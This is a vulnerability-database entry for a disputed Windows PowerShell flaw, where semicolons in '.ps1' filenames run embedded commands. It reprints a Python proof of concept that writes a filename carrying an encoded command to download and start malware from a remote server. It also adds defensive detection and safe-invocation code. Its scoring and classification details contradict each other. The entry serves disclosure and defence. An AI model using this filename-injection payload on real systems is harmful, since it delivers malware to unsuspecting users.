Microsoft Windows PowerShell privilege escalation [Disputed] – Digitalmunition





Published on August 30th, 2019



CVSS Meta Temp Score: 4.9
Current Exploit Price (≈): $0-$5k

A vulnerability classified as critical was found in Microsoft Windows (Operating System); the affected version is unknown. It affects unknown functionality of the PowerShell component. Manipulation of the script filename leads to a privilege escalation vulnerability (CWE-269). The reported impact is on confidentiality, integrity, and availability.

The weakness was shared on 08/01/2019 by John Page (hyp3rlinx) as an unconfirmed security advisory (website). The advisory is available at hyp3rlinx.altervista.org. The vendor cooperated in the coordination of the public release. Local access is required for this attack, and a single authentication is needed for exploitation. Technical details are unknown, but a public exploit is available. The advisory points out:

PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames. This occurs when “.ps1” files contain semicolons “;” or spaces as part of the filename, causing the execution of a different trojan file; or the running of unexpected commands straight from the filename itself without the need for a second file.

A public exploit, written in Python, was developed by John Page (hyp3rlinx) and published immediately after the advisory. It is declared as a proof-of-concept and can be downloaded at hyp3rlinx.altervista.org. The vulnerability was handled as a non-public zero-day exploit for at least 12 days; during that time the estimated underground price was around $5k-$25k. The real existence of this vulnerability is still doubted at the moment. The code used by the exploit is:

from base64 import b64encode
import argparse, sys
#Windows PowerShell - Unsanitized Filename Command Execution Vulnerability PoC
#Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename.
#Expects hostname/ip-addr of web-server housing the exploit.
#By hyp3rlinx
#Apparition Security
#====================


def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
    parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.")
    parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")
    # Print usage and stop when no arguments were given at all.
    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        sys.exit(1)
    return parser.parse_args()

def main(args):
    # Build the command that will be embedded in the filename. PowerShell's -e
    # (-EncodedCommand) expects base64 of the UTF-16LE encoded command text.
    PSEmbedFilenameMalwr=""
    if args.ipaddress:
        PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name
    # b64encode() returns bytes; decode to str so it can be spliced into the filename.
    return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE')).decode('ascii')

def create_file(payload):
    # Filename of the shape "Test;PowerShell -e <base64>;2.ps1": when the name is
    # parsed as a command string, each ';' separates a statement. Note that base64
    # output may contain '/', which is not a valid Windows filename character, so
    # not every payload can be written under this name.
    f=open("Test;PowerShell -e "+payload+";2.ps1", "w")
    f.write("Write-Output 'Have a nice day!'")
    f.close()

if __name__=="__main__":
    PSCmds = main(parse_args())
    create_file(PSCmds)
    print("PowerShell - Unsanitized Filename Command Execution File created!")
    print("By hyp3rlinx")

The advisory illustrates:

For trojan files it doesn’t need to be another PowerShell script and can be one of the following: “.com, .exe, .bat, .cpl, .js, .vbs and .wsf”. Therefore, the vulnerably named file “.Hello;World.ps1” will instead execute “hello.exe”, if that script is invoked using the standard Windows shell “cmd.exe” and “hello.exe” resides in the same directory as the vulnerably named script.
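The following Python is an added example and is not part of the advisory or of the PoC above. It takes the behaviour as the advisory describes it: a caller that splices a ".ps1" filename into a "powershell" command line lets the name be parsed as PowerShell statements, so ";" inside the name separates commands. It shows the unsafe and a safer way to launch a script (an allow-list on the name, then the name passed as its own argv element after -File, so it is a path rather than a command string), and a defender-side check that splits a name the way -Command parsing would and decodes any embedded "-e" base64 payload of the shape the PoC generates. Function names and the sample filenames are my own constructions; the handling of "-e" assumes it is the abbreviated -EncodedCommand switch, which powershell.exe accepts.

```python
import base64
import re

# Constructed sample: the filename shape produced by the PoC above, with a
# harmless embedded command so this runs offline. Nothing here is executed.
def poc_style_name(command: str) -> str:
    enc = base64.b64encode(command.encode("utf-16le")).decode("ascii")
    return "Test;PowerShell -e " + enc + ";2.ps1"

# Unsafe: the name is glued into a command line. A bare argument to
# powershell.exe is treated as -Command, so ';' in the name ends a statement.
def unsafe_command_line(script_name: str) -> str:
    return "powershell " + script_name

# Safer: strict allow-list on the name (no ';', no spaces, .ps1 only), then
# pass it as a separate argv element after -File. (Hypothetical helper.)
SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,254}\.ps1$")

def script_name_is_safe(script_name: str) -> bool:
    return SAFE_NAME.fullmatch(script_name) is not None

def safe_argv(script_name: str) -> list:
    if not script_name_is_safe(script_name):
        raise ValueError("rejected script name: %r" % script_name)
    return ["powershell.exe", "-NoProfile", "-NonInteractive", "-File", script_name]

# Detection: what -Command parsing would see in the name, and whether it
# carries an encoded payload ('powershell -e <base64>' or longer spellings).
ENCODED = re.compile(
    r"(?i)\bpowershell(?:\.exe)?\s+-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

def decode_encoded_command(b64: str) -> str:
    # Tolerate missing padding; -e payloads are UTF-16LE text.
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16le", errors="replace")

def inspect_ps1_name(script_name: str) -> dict:
    statements = [s.strip() for s in script_name.split(";") if s.strip()]
    encoded = [decode_encoded_command(m.group(1)) for m in ENCODED.finditer(script_name)]
    return {
        "name": script_name,
        "statements": statements,        # pieces -Command would run in turn
        "encoded_commands": encoded,     # decoded -e payloads, if any
        "suspicious": len(statements) > 1 or bool(encoded),
    }

if __name__ == "__main__":
    for name in ("report.ps1", "Hello;World.ps1", poc_style_name("calc")):
        info = inspect_ps1_name(name)
        verdict = "SUSPICIOUS" if info["suspicious"] else "ok"
        print(name, "->", verdict, info["statements"], info["encoded_commands"])
        print("  unsafe:", unsafe_command_line(name))
        print("  safe:  ", safe_argv(name) if script_name_is_safe(name) else "rejected")
```

Run it on a directory listing of .ps1 names to flag candidates; the allow-list is deliberately strict, since the disputed behaviour only matters when a name reaches powershell.exe as part of a command string rather than as a path.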

The best possible mitigation is suggested to be disabling the affected component.


VulDB Meta Base Score: 5.3
VulDB Meta Temp Score: 4.9
VulDB Base Score: 5.3
VulDB Temp Score: 4.9

Class: Privilege escalation (CWE-269)
Local: Yes
Remote: No

Access: Public
Status: Proof-of-Concept
Author: John Page (hyp3rlinx)
Programming Language: Python

Remediation: Recommended: Disable

07/20/2019 Vendor informed
07/23/2019 +3 days Vendor acknowledged
08/01/2019 +9 days Advisory disclosed
08/01/2019 +0 days Exploit disclosed
08/30/2019 +29 days VulDB entry created
08/30/2019 +0 days VulDB last update

Vendor: microsoft.com
Product: Microsoft Windows (PowerShell)

Advisory: hyp3rlinx.altervista.org
Researcher: John Page (hyp3rlinx)
Status: Unconfirmed
Coordinated: Yes
Disputed: Yes

Created: 08/30/2019 08:06 AM
Submitter: hyp3rlinx

VulDB entry: https://vuldb.com/?id.141094
